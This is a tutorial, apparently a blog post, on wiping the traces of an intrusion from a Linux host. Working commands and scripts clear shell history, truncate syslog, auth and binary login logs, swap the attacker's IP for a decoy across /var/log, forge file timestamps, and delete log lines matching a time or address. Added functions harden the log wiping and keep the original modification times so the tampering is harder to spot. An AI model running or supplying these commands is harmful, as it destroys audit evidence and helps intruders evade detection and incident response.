After a penetration is complete, an attacker who wants to lower the odds of being detected and traced back has to clear their own traces. This post summarizes the ways of cleaning up traces on Linux. (It may not be complete: only the few most common methods are collected here, and they may not be thorough.)
Clearing history

```bash
vim ~/.bash_history   # edit or empty the history file saved on disk
history -c            # clear the in-memory history list of the current shell
```

`history -c` only empties the list that the running bash holds in memory; the file on disk is what the `vim` step removes. An interactive bash writes its in-memory list back to `~/.bash_history` when it exits, so run `history -c` as the last step of the session: anything typed after it is recorded again and saved at logout.
Clearing logs

```bash
echo > /var/log/syslog; echo > /var/log/messages; echo > /var/log/httpd/access_log; echo > /var/log/httpd/error_log; echo > /var/log/xferlog; echo > /var/log/secure; echo > /var/log/auth.log; echo > /var/log/user.log; echo > /var/log/wtmp; echo > /var/log/lastlog; echo > /var/log/btmp; echo > /var/run/utmp; history -c
```

or, the same list written once through `tee`:

```bash
echo | tee /var/log/syslog /var/log/messages /var/log/httpd/access_log /var/log/httpd/error_log /var/log/xferlog /var/log/secure /var/log/auth.log /var/log/user.log /var/log/wtmp /var/log/lastlog /var/log/btmp /var/run/utmp > /dev/null; history -c
```

Two caveats. `echo > file` does not empty the file: it leaves a single newline behind. For text logs that is harmless, but wtmp, btmp, lastlog and utmp are binary record files read by `last`, `lastb`, `lastlog` and `who`, and a one-byte file is not a valid record; `: > file` truncates to zero bytes instead. The paths above are the classic syslog layout: on systemd hosts journald keeps its own logs under /var/log/journal, which none of these commands touch, and on Debian/Ubuntu the Apache logs live under /var/log/apache2 rather than /var/log/httpd.
Replacing an IP by pattern

```bash
sed -i "s/132\.23\.11\.x/192.7.22.12/g" $(grep -rl 132.23.11.x /var/log)
```

Put the address to hide in place of `132.23.11.x` and a plausible replacement in place of `192.7.22.12`. The dots in the search pattern are escaped because an unescaped `.` in a sed expression matches any character, and there must be no space in front of the replacement address, or that space is written into the logs too. If grep matches no file the argument list is empty and `sed -i` sits waiting on stdin, so check that grep returned something first.
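The one-liner above is fragile in two ways: an unescaped `.` matches any character, and an empty grep result leaves sed reading from stdin. The function below is an added example, not code from the original post. It assumes GNU grep and a POSIX sh with `mktemp`; the function name `replace_ip` and the addresses in the usage line are made up for illustration. It escapes the dots, finds the files with a fixed-string grep, rewrites each file through its existing inode (GNU `sed -i` instead writes a new file and renames it into place, so the inode changes), and prints the number of files rewritten so the caller can tell whether anything matched.

```bash
#!/bin/sh
# Added example, not from the original post.
# replace_ip OLD_IP NEW_IP DIR
#   Rewrite every file under DIR that contains OLD_IP so that it reads NEW_IP
#   instead, and print the number of files rewritten (0 when nothing matched).
replace_ip() {
    old="$1"; new="$2"; dir="$3"
    # Escape the dots so the sed pattern matches the literal address only:
    # "132.23.11.5" must not also match "132x23x11x5".
    old_re=$(printf '%s' "$old" | sed 's/\./\\./g')
    tmpf=$(mktemp) || return 1
    # -F matches the address as a fixed string, -l lists file names only.
    # The loop runs on the right-hand side of the pipe, so the counter is
    # printed from inside that same group.
    grep -rlF -- "$old" "$dir" 2>/dev/null | {
        n=0
        while IFS= read -r f; do
            # Filter into a scratch file, then copy the result back into the
            # existing file. The inode stays the same; with sed -i it would not.
            # (An IP contains no '&' or '/', so $new needs no sed escaping.)
            sed "s/$old_re/$new/g" "$f" > "$tmpf" && cat "$tmpf" > "$f" && n=$((n+1))
        done
        echo "$n"
    }
    rm -f "$tmpf"
}

# Usage (hypothetical addresses):
#   replace_ip 132.23.11.5 192.7.22.12 /var/log
```

The rewrite still updates each file's mtime and ctime, which the timestamp section below deals with; combining the two is left to the reader.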
Changing file timestamps

```bash
touch -r A.php B.php; history -c                   # give B.php the timestamps of A.php
touch -d "2021-03-29 14:01:22" 1.txt; history -c   # set the timestamps to a chosen value
```

`touch` sets only the access time and the modification time. The inode change time (ctime) is set by the kernel at the moment of the `touch` itself and cannot be chosen from userspace, so `stat` on the file still shows when it was last touched, and a ctime later than the mtime is a common tell.
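The log truncation and the timestamp trick are usually wanted together: empty the file, but leave its mtime where it was so `ls -l` does not show a log that was written to at the moment of the attack. The functions below are an added example, not code from the original post. They assume GNU coreutils (`touch -r`, `mktemp`) and any POSIX sh; the names `wipe_log_keep_mtime` and `wipe_logs_keep_mtime` are made up here. They use `: >` rather than `echo >`, so binary logs such as wtmp, btmp and lastlog end up empty rather than one byte long, and they skip paths that do not exist on the host instead of creating them.

```bash
#!/bin/sh
# Added example, not from the original post.
# wipe_log_keep_mtime FILE
#   Truncate FILE to zero bytes and restore its original atime and mtime.
#   Returns 1 and changes nothing if FILE does not exist.
wipe_log_keep_mtime() {
    _f="$1"
    [ -f "$_f" ] || return 1
    _ref=$(mktemp) || return 1
    # Copy the file's current timestamps onto a scratch file before writing.
    touch -r "$_f" "$_ref" || { rm -f "$_ref"; return 1; }
    # ':' is a no-op, so this truncates the file to zero bytes. 'echo >' would
    # leave a single newline behind, which matters for the binary logs.
    : > "$_f"
    # Put the saved timestamps back. ctime is still updated by the kernel and
    # cannot be set with touch, so 'stat' will show when this ran.
    touch -r "$_ref" "$_f"
    rm -f "$_ref"
}

# wipe_logs_keep_mtime FILE...
#   Apply wipe_log_keep_mtime to each argument, skipping files that are not
#   present on this host, and print the number of files actually wiped.
wipe_logs_keep_mtime() {
    n=0
    for f in "$@"; do
        wipe_log_keep_mtime "$f" && n=$((n+1))
    done
    echo "$n"
}

# Typical call with the paths listed in the post:
#   wipe_logs_keep_mtime /var/log/syslog /var/log/messages /var/log/secure \
#       /var/log/auth.log /var/log/wtmp /var/log/btmp /var/log/lastlog /var/run/utmp
```

The printed count is worth reading: it tells you which of the classic paths exist at all, which on a systemd or Debian host is often fewer than the list suggests.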
Deleting lines that match a timestamp or another keyword

delect.sh:

```bash
#!/bin/bash
# Delete every line that matches $1 (a timestamp, an IP, a username, ...)
# from each file under /var/log that contains it.
for f in $(grep "$1" -rl /var/log)
do
    # Filter the file into a variable and write it back through the same
    # inode rather than with sed -i, which would create a new file.
    tmp=$(sed -e "/$1/d" "$f")
    printf "%s\n" "$tmp" > "$f"
done
```

Usage: `./delect.sh "Mar 29 14:01"` or `./delect.sh 192.7.22.12`. Command substitution strips the trailing newline from the filtered text, which is why `printf "%s\n"` adds it back. A pattern containing `/` has to be escaped, since `/` delimits the sed expression, and the file list breaks on paths with spaces because the `for` loop splits grep's output on whitespace.